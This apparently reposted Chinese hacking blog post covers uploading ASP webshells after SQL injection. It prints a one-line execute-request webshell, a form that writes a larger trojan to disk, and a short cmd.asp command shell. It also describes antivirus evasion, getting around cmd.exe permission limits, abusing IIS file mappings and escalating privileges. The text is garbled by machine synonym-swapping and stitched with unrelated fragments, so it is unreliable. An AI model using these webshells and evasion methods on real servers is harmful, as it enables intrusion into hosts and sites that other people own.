SQL注入与ASP木马上传

  • 内容
  • 评论
  • 相关

我以原版海阳顶端木马为例,率先把ASP木马合成据库(copyX.mdb+X.aspX.asp),应用杀毒软件查杀,得以躲过瑞星2006、卡巴斯基反病毒6.0、Kv2006、McAfee。

其五,c://winnt//system32//inetsrv//data即这目次,雷同是erveryone完整统制,咱所要做的即把提拔权限的工具上传上来,然后履行采用asp.dll提权asp文书的教科书解说是由asp.dll运转的。

由于多数网站入侵都是采用asp木马完竣的,特写此篇以使普通虚构长机用户能更好地理解、防护asp木马。

突破常轨限量运转asp木马(转)@more@本子入侵中往往会上传一个asp木马来进一步壮统治权限,或在肉鸡中留一个asp方便之门也是一个象样的选择。

以次假想取得的数据库名是TestDB。

在盗码者防线2003年7期xhacker有篇篇《巧妙设立cmd权限增强长机安好布置》提到过防备网上游行的cmd.asp木马(见备件)法子是得以用cacls%systemroot/system32/cmd.exe/E/DIUSR_machinecacls%systemroot/system32/dllcache/cmd.exe/E/DIUSR_machine这么两条下令来限止cmd.exe的权限,于是cmd.asp木马就失掉功能了。

drive2:path2指定要轮换文书的目次。

说了半晌这提拔权限的事一点没讲啊不要急,大伙儿看看对手保管员的这站点保管器,顶用户名和密码,密码是星号的。

OpenCV是一个因BSD许可(开源)刊行的跨阳台电脑感官库,得以运转在Linux、Windows、Android和MacOS操作系上。

然后是用户名:LocalAdministrator密码:l@$ak.lk;0@P(密码都是假名)规定,然后点刚刚建的服务器,然后就得以看到已有用户,本人新建一个用户,把一切权限加上。

来看一下几种比常见的ASP木马免杀法子:1.加密法常用的是用微软的源码加密工具screnc.exe,以此来躲开杀毒软件的追杀。

句话木马的适用条件:1.服务器的来宾账户有写入权限2.已知数据库地点且数据库格式为asa或asp3.在数据库格式不为asp或asa的情形下,如其能将一句话插入到asp文书中也可一句话木马的职业原理:"一句话木马"服务端(本土的html交文书)即咱要用于插入到asp文书中的asp文句,(不止仅是以asp为后缀的数据库文书),该文句将回为触发,收征服者经过路人户端交的数据,履行并完竣相对应的操作,服务端的代码情节为<%executerequest("value")%>内中value得以本人改动"一句话木马"客户端(远道服务器上被插入一句话的asp文书)用于向服务端交统制数据的,交的数据经过服务端结成完全的asp功能文句并履行,也即生成咱所需求的asp木马文书现时先假想在远道长机的TEXT.ASP(客户端)中曾经有了<%executerequest("value")%>这文句.)在ASP里<%execute............")%>意是履行删节号里的文句.那样如其我写进咱精心结构的文句,它也是会帮咱履行的.就依照这上的笔录,咱就得以在本土结构一个表单情节如次:(//为诠注)setlP=server.createObject("Adodb.Stream")//成立流冤家lP.Open//开lP.Type=2//以公文方式lP.CharSet="gb2312"//书体基准lP.writetextrequest("newvalue")lP.SaveToFileserver.mappath("newmm.asp"),2//将木马情节以捂文书的方式写入newmm.asp,2即已捂的方式lP.Close//关冤家setlP=nothing//开释冤家response.redirect"newmm.asp"//转向newmm.asp添入生成木马的情节


表单的功能即把咱表单里的情节交到远道长机的TEXT.ASP这文书.然后因TEXT.ASP里有<%executerequest("value")%>这句,那样这句代码就会履行咱从表单里传来的情节哦.(表单名务须和<%executerequest("value")%>里的VALUE一样,即我用蓝色标志的那两处,务须相当)说到这边大伙儿是否明白了.咱结构了两个表单,头个表单里的代码是文书操作的代码(即把二个表单内的情节写入在眼下目次下并定名为newvalue.ASP的这样一段操作的料理代码)那样二个表单自然即咱要写入的马了.具体的即下这一段:setlP=server.createObject("Adodb.Stream")//成立流冤家lP.Open//开lP.Type=2//以公文方式lP.CharSet="gb2312"//书体基准lP.writetextrequest("newvalue")lP.SaveToFileserver.mappath("newvalue.asp"),2//将木马情节以捂文书的方式写入newmm.asp,2即已捂的方式lP.Close//关冤家setlP=nothing//开释冤家response.redirect"newmm.asp"//转向newmm.asp这样的话二个表单的名务须和lP.writetextrequest("newvalue")里的Newvalue一样,即我用红色标明的那两处.于今只要服务器有写的权限你表单所交的大马情节就会被写入到newmm.asp中。

更为怕人的是我在runasp.asp里调用测试一些祸心代码时,竟然躲过了瑞星的查杀。

细观测一下<%executerequest()%>这句代码,括号里的是咱一句话的密码,咱得以把它改成肆意字符,这么得以幸免旁人发觉咱的一句话木马后,自在的经过它捡个大贱,如其咱上传的一句话代码为<%executerequest(123456″)%>。

下是一个轮回。

干吗不更短呢?四个,更短的cmd.asp<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>好像这即最短的了。

动力篇系3.51,(图一)实则动力篇系的一切本子全体通杀,囊括动易。

溜呵呵服务器即你的了hoky:这篇篇前段时刻不懂得在那地域看过.转贴的时节就没写笔者是谁.我也不记了.版权申明:本站篇有些自网,如有侵权,请关联:west999com@outlook.com非常留意:本站一切转载篇论不代替本站角度!本站所供的图样等材,版权归原笔者一切,如需应用,请与原笔者关联。

系作用:1、创始站点:创始站点时机动为每个站点创始一个自立Windows用户,该用户属GUESTS组,防护ASP木马。

或是/1.asp/1.gif等会履行的情况『取缔如次目次履行本子』防备图样和上传等可写目次履行本子『防护工具扫描网站...《暗战亮剑-盗码者攻防入门与进阶全程实录》┊张晓.PDF3.5.2海阳顶端网ASP木马剖解3.5.3有关权限的情况3.5.4SQLRootkit攻防3.5.5Windows2003上以.asp结尾的文书夹安好情况3.5.6ASP木马的免杀剖解3.6机动化渐工具剖解第4章PHP本子漏子及防守4.1PHP...光伏-储能并网系仿真.rar该文书是清华大学储能课的期末大工作。

在iis默认装置情况下,咱得以查觉asa、cer、cdx后缀也得以胜利运转asp代码,因这三种后缀的文书映照都是调用了系的asp.dll。

对准这种限量咱也有点子突破,咱得以将本机的cmd.exe化名传到肉鸡上,假想咱将cmd.exe化名为lcx.exe,传在肉鸡的d:lcx目次下,于是咱开cmd.asp,找到CalloScript.Run("cmd.exe/c"&szCMD&">"&szTempFile,0,True)这一条龙源码,改为CalloScript.Run("d:lcxlcx.exe/c"&szCMD&">"&szTempFile,0,True)即可,咱又得以胜利运转cmd.asp了。

空中商不得不防备征服者采用已被入侵的站点再次入侵同一服务器上其它站点的行止。

自然我也取得了我想取得的家伙——很多好的软件和代码。

评论

0条评论

发表回复

您的电子邮箱地址不会被公开。